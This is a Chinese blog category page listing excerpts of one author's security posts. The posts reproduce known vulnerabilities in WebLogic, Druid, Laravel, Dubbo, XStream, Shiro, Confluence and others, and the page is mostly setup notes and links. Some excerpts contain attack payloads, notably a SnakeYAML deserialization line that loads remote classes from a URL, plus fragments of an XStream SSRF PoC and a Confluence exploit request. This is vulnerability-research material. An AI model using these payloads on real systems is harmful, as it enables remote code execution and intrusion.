安全
文章平均质量分 52
caiqiiqi
这个作者很懒,什么都没留下…
展开
-
[CVE-2018-2894] WebLogic文件上传漏洞
CVE-2018-2894:/ws_utc 这个路径的文件上传漏洞两个上传接口触发点:/ws_utc/resources/ws/config/import/ws_utc/config.do本poc以前者为例,进行poc和利用。上传成功之后会响应500,抛出NullPointerException,但是利用已经成功。关于weblogic各版本的可利用情况:10.3.6版本上未发现该功能,需手动开启:登录控制台-》配置-》高级-》勾选启用Web服务测试页 -》保存12.1.3.0默认开启原创 2021-03-29 14:13:39 · 939 阅读 · 0 评论 -
cloudera安装
参考:https://my.oschina.net/u/4262067/blog/4693381https://docs.cloudera.com/documentation/other/Licenses/topics/ctpl_topic_4_2.html原创 2021-03-23 14:35:40 · 247 阅读 · 0 评论 -
移除掉firefox里的无用请求
经常用firefox进行代理到burp上,firefox容易发出大量无用请求,影响体验,参考:https://twitter.com/hackerscrolls/status/1261224450827190272https://gist.github.com/AetherEternity/5a6bb6e493a3d34988fc7342013f2ea6// Mozilla User Preferences// To change a preference value, you can eith原创 2021-02-20 10:29:24 · 744 阅读 · 0 评论 -
[CVE-2020-13924] Apache Ambari任意文件下载
安装方式:http://ambari.apache.org/install.htmlhttps://blog.e-zest.com/installing-and-setting-hdfs-cluster-through-ambari来源:https://seclists.org/oss-sec/2021/q1/116原创 2021-02-08 10:42:13 · 1578 阅读 · 0 评论 -
Apache Druid远程代码执行漏洞[CVE-2021-25646]
安装教程:参考:https://druid.apache.org/docs/latest/tutorials/index.html执行用户提供的脚本:https://druid.apache.org/docs/latest/development/javascript.html原创 2021-02-01 14:09:49 · 704 阅读 · 1 评论 -
[CVE-2020-17532] Apache servicecomb-java-chassis Yaml remote deserialization vulnerability
修复的commit还有测试用例都在里面:https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c又是yaml反序列化:!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]或者:!!javax.script.原创 2021-01-21 20:24:50 · 458 阅读 · 0 评论 -
关于WebLogic中的Netuix
参考:https://docs.oracle.com/cd/E13218_01/wlp/docs81/whitepapers/netix/body.html需要配置一个xml格式的.portal文件。像jsp文件可以包含其他jsp文件一样,.portal文件可以包含其他.pinc文件。原创 2021-01-20 19:28:21 · 370 阅读 · 1 评论 -
JumpServer未授权RCE
参考https://saucer-man.com/information_security/520.htmlhttps://blog.riskivy.com/jumpserver-%e4%bb%8e%e4%bf%a1%e6%81%af%e6%b3%84%e9%9c%b2%e5%88%b0%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/https://www.o2oxy原创 2021-01-19 11:54:24 · 1139 阅读 · 1 评论 -
反序列化新的Gadget:com.sun.jndi.ldap.LdapAttribute
这个CTF是1.4的Java。同时由于这个类在1.8中依然存在,所以也可以在1.8利用:一些新手可能会被 ysoserial 里标注的利用链依赖库版本所迷惑,认为某个链就只能在对应标注的依赖版本下起作用,其实并非如此。像 ysoserial 里 CommonsBeanutils1 这个链,作者标注的依赖版本是:commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2但这些版本实际上反映的只是 ysoserial 作者在原创 2021-01-14 12:00:28 · 1170 阅读 · 0 评论 -
鉴权/认证框架Spring Security和Apache Shiro比较
参考:https://www.cnblogs.com/minxiang-luo/p/12492905.htmlhttps://www.javadevjournal.com/spring-boot/spring-boot-application-intellij/松哥手把手教你在 SpringBoot 中防御 CSRF 攻击!so easy!打开IDEA => File => New => Project,选择选择 Spring Initializr如果IDEA自动下载的依赖中原创 2021-01-13 17:42:34 · 1633 阅读 · 0 评论 -
Laravel <= v8.4.2 debug mode: Remote code execution
步骤:$ git clone https://github.com/laravel/laravel.git$ cd laravel$ git checkout e849812$ composer install$ composer require facade/ignition==2.5.1$ php artisan serve安装composer:curl -sS https://getcomposer.org/installer -o composer-setup.phpsudo p原创 2021-01-13 11:27:55 · 735 阅读 · 1 评论 -
Apache Flink漏洞CVE-2020-17518
参考:https://www.freebuf.com/vuls/260257.htmlhttps://www.anquanke.com/post/id/227668原创 2021-01-08 19:15:19 · 708 阅读 · 0 评论 -
alibaba nacos
下载地址:https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.zip安装启动方法:cd nacos\bin.\startup.cmd -m standalone启动输出:PS C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\bin> .\startup.cmd -m st原创 2020-12-31 11:26:31 · 2337 阅读 · 0 评论 -
PostgreSql数据库手工注入玩法
http://www.secist.com/archives/453.html原创 2019-03-29 17:32:27 · 1294 阅读 · 0 评论 -
Dubbo新漏洞
Dubbo的反序列化漏洞比较:[CVE-2019-17564] 当用户选择http协议进行通信时,Apache Dubbo 将接受来自消费者远程调用的POST请求并执行一个反序列化的操作。由于此步骤没有任何安全校验,因此可以造成反序列化执行任意代码。[CVE-2020-1948] 默认反序列化方式存在代码执行漏洞,当 Dubbo 服务端暴露时(默认端口:20880),攻击者可以发送未经验证的服务名或方法名的RPC请求,同时配合附加恶意的参数负载。当恶意参数被反序列化时,它将执行恶意代码。参考:ht原创 2020-12-25 14:22:39 · 2265 阅读 · 0 评论 -
[CVE-2020-7200] HPE Systems Insight Manager (SIM) AMF反序列化RCE
参考:https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c05350888下载地址:https://support.hpe.com/hpesc/public/docDisplay?docId=em原创 2020-12-22 16:51:34 · 992 阅读 · 0 评论 -
[CVE-2020-35476] OpenTSDB <=2.4.0 RCE
安装条件:ZookeeperHBaseZookeeperwget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2.tar.gzcd confcp zoo_sample.cfg zoo.cfgvi zoo.cfg# 修改dataDir=data,然后启动bin/zkServer.sh startHBaseopentsdb的后端数据存储依赖于HB原创 2020-12-21 16:52:01 · 1177 阅读 · 0 评论 -
Gitlab 任意文件读取漏洞(CVE-2016-9086)以及gitlab SSRF to redis
使用vulhub的环境:https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2016-9086任意文件读取漏洞(CVE-2016-9086):GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13任意用户authentication_token泄露漏洞:Gitlab CE/EE versions 8.10.3-8.10.5docker起来之后是这样:新建项目的时候有一个从Gitl原创 2020-12-16 16:07:08 · 1216 阅读 · 0 评论 -
[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞
漏洞详情CVE-2020-26259:任意文件删除。CVE-2020-26258:SSRF细节poc[CVE-2020-26258] SSRF<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.run原创 2020-12-15 11:22:19 · 3336 阅读 · 8 评论 -
Confluence未授权模板注入/代码执行(CVE-2019-3396)
https://jira.atlassian.com/browse/CONFSERVER-57974https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.pyPocPOST /rest/tinymce/1/macro/preview HTT...原创 2019-04-04 20:15:34 · 6682 阅读 · 1 评论 -
AMF反序列化/XXE/SSRF漏洞
参考:CVE-2017-5641Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default.Adobe/Apache Flex Java library历史原因:Flex BlazeDS by Adobe (retired, contributed Flex原创 2020-12-04 11:16:15 · 3898 阅读 · 0 评论 -
mosec-maven-plugin检测maven项目的第三方库漏洞
settings.xml里:<!-- 添加pluginGroup可简化命令行参数 --><pluginGroups> <pluginGroup>com.immomo.momosec</pluginGroup></pluginGroups><profiles> <profile> <id>momo-plugin</id> <pluginReposi原创 2020-11-25 14:58:48 · 897 阅读 · 0 评论 -
[CVE-2020-8277]nodejs DNS DOS
漏洞描述:A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a lar原创 2020-11-20 15:02:11 · 499 阅读 · 0 评论 -
xxl-job 执行器 RESTful API 未授权访问 RCE
参考:https://www.buaq.net/go-43356.htmlhttps://github.com/jas502n/xxl-jobhttps://landgrey.me/blog/18/环境搭建下载源码git clone https://github.com/xuxueli/xxl-job.git打开文件xxl-job/xxl-job-executor-samples/xxl-job-executor-sample-springboot/src/main/resources原创 2020-11-10 14:27:07 · 1836 阅读 · 0 评论 -
[CVE-2020-13935] Tomcat WebSocket拒绝服务漏洞
影响范围9.0.0.M1~9.0.3610.0.0-M1~10.0.0-M68.5.0~8.5.567.0.27~7.0.104修复建议升级到修复版本http://tomcat.apache.org/缓解措施:若无特殊需要,关闭Tomcat Websocket功能,删除example下的websocket示例。漏洞检测:判断版本判断examples的websocket页面是否存在漏洞利用效果:端口可访问;服务不可用。升级之后的效果:使用之前的利用方式无法造成DOS效果。原创 2020-11-09 14:04:45 · 2785 阅读 · 3 评论 -
gadgetinspector学习
参考threedr3am大佬的讲解:改造gadgetinspector篇-自动化挖掘Fastjson gadget chaingit clone https://github.com/threedr3am/gadgetinspectorcd gadgetinspector./gradlew shadowJar# 执行java -jar build/libs/gadget-inspector-all.jar --config fastjson /c/Users/Administrator/.原创 2020-10-30 18:36:06 · 556 阅读 · 0 评论 -
[CVE-2020-14882/CVE-2020-14883]weblogioc http console认证绕过+任意代码执行
参考:CVE-2020-14882 weblogic 未授权命令执行复现https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbfAdministrator@cqq MINGW64 /e/Oracle/Middleware12.2.1.3$ grep -rn "com.tangosol.coherence.mvel2.sh.ShellSession"原创 2020-10-29 12:48:39 · 3394 阅读 · 4 评论 -
Shiro Padding Oracle Attack
#TODO参考:我对Padding Oracle攻击的分析和思考(详细)Shiro Padding Oracle Attack 反序列化Apache Shiro源码浅析之从远古洞到最新PaddingOracle CBChttps://github.com/threedr3am/marshalsec#2-shiropaddingoraclecbcpadding oracle 原理深度解析 & CBC 字节翻转攻击原理解析...原创 2020-10-26 14:44:17 · 573 阅读 · 1 评论 -
JMX RMI服务
参考:Tomcat开启JMX远程监控在catalina.bat文件中新增SET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremoteSET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremote.port=7199SET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremote.ssl=fal原创 2020-10-22 20:05:00 · 667 阅读 · 2 评论 -
[CVE-2020-13933]Shiro权限绕过导致的Nexus漏洞
参考:https://support.sonatype.com/hc/en-us/articles/360053556313-CVE-2020-13933-Nexus-Repository-Manger-2-3-Shiro-Authentication-Bypasshttps://issues.sonatype.org/browse/NEXUS-25086https://help.aliyun.com/noticelist/articleid/1060730690.htmlhttps://gith原创 2020-10-22 15:51:44 · 1427 阅读 · 0 评论 -
VMware vCenter任意文件读取漏洞
参考:https://twitter.com/ptswarm/status/1316016337550938122【安全风险通告】VMware vCenter任意文件读取漏洞安全风险通告安装:https://blog.csdn.net/shida_csdn/article/details/82863169https://www.miensi.com/352.html安装有点麻烦,算了。下载:https://my.vmware.com/en/web/vmware/downloads/det原创 2020-10-15 10:31:18 · 2310 阅读 · 0 评论 -
[CVE-2020-26945]mybatis二级缓存反序列化漏洞
参考:https://github.com/mybatis/mybatis-3/compare/mybatis-3.5.5…mybatis-3.5.6https://github.com/mybatis/mybatis-3/pull/2079CVE-2020-26945 mybatis二级缓存反序列化的分析与复现原创 2020-10-14 10:35:01 · 2617 阅读 · 0 评论 -
[CVE-2020-13957] Solr configset权限绕过漏洞
影响版本6.6.0 to 6.6.57.0.0 to 7.7.38.0.0 to 8.6.2漏洞描述本来Solr禁止一些可能造成RCE的危险操作通过ConfigSet这个API上传进行配置。但是可以通过结合UPLOAD/CREATE这两个ACTION来绕过这一限制。原文Solr prevents some features considered dangerous (which could be used for remote code execution) to be configur原创 2020-10-13 11:33:29 · 2614 阅读 · 5 评论 -
JSP webshell学习
参考:JSP-Webshells集合都0202年了老嗨还在用的 - 各种姿势jsp webshell原理总结使用com.sun.org.apache.bcel.internal.util.ClassLoader加载BCEL格式的字节码自定义ClassLoader,在findClass方法中硬编码类的字节码的base64,然后loadClass利用new ScriptEngineManager().getEngineByName(“nashorn”)#eval执行任意代码使用URLClas原创 2020-10-10 17:07:06 · 1261 阅读 · 0 评论 -
OpenRASP(Runtime Application Self-Protection)
与WAF不同,WAF是在应用的流量入口之前(即应用外面),RASP是跟应用在一个JVM里(即应用内部)。下载地址:https://github.com/baidu/openrasp/releases/download/v1.3.5/rasp-java.zip安装参考:https://rasp.baidu.com/doc/install/manual/spring-boot.html百度安全的OpenRASP项目,究竟是什么?Spring boot应用安装方式:在IEDA启动的VM参数中:原创 2020-09-27 16:42:59 · 581 阅读 · 0 评论 -
[CVE-2020-9496]Apache Ofbiz RCE
参考:Apache Ofbiz RCE (CVE-2020-9496) 漏洞分析CVE-2020-9496 apache ofbiz xml-rpc反序列化漏洞分析https://www.zerodayinitiative.com/blog/2020/9/14/cve-2020-9496-rce-in-apache-ofbiz-xmlrpc-via-deserialization-of-untrusted-data如果遇到java.lang.UnsupportedClassVersionErr原创 2020-09-23 11:20:10 · 2352 阅读 · 0 评论 -
how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM笔记
参考:https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/发现Facebook 使用 MobileIron 當作他們的 MDM 解決方案。虽然官网没找到,但是通过google搜索到了开发商测试用的rpm包。通过分析代码,发现对外开放端口如下:443 為使用者裝置註冊介面8443 為設備管理介面9997 為一個 MobileIron 私有的裝置同步原创 2020-09-14 10:44:09 · 434 阅读 · 0 评论 -
spring boot的Thymeleaf模板注入
参考:java安全开发之spring boot Thymeleaf模板注入https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/https://github.com/veracode-research/spring-view-manipulation场景是view的名字是用户可控时,原创 2020-09-07 14:00:41 · 1550 阅读 · 0 评论 -
weblogic使用jdk7u21 gadget以及回显
参考:https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jdk7u21.javaJava 反序列化漏洞始末(2)— JDK条件:jdk < = 7u21Weblogic与jdk的兼容性问题好像10.3.6不支持jdk 1.8,不过好像可以先用jdk 6,7安装之后然后bypass。https://stackoverflow.com/questions/22513660/原创 2020-09-03 17:10:01 · 852 阅读 · 0 评论 -
[CVE-2019-2725] Weblogc XMLDecoder RCE
主要看看回显方案,参考:https://github.com/iceMatcha/CNTA-2019-0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE-2019-2725/blob/master/weblogic_exploit.pyWeblogic 远程命令执行漏洞分析(CVE-2019-2725)及利用payload构造详细解读因为之前的补丁已经对xml的内容进行了限制:object、ne原创 2020-08-27 18:23:02 · 1930 阅读 · 0 评论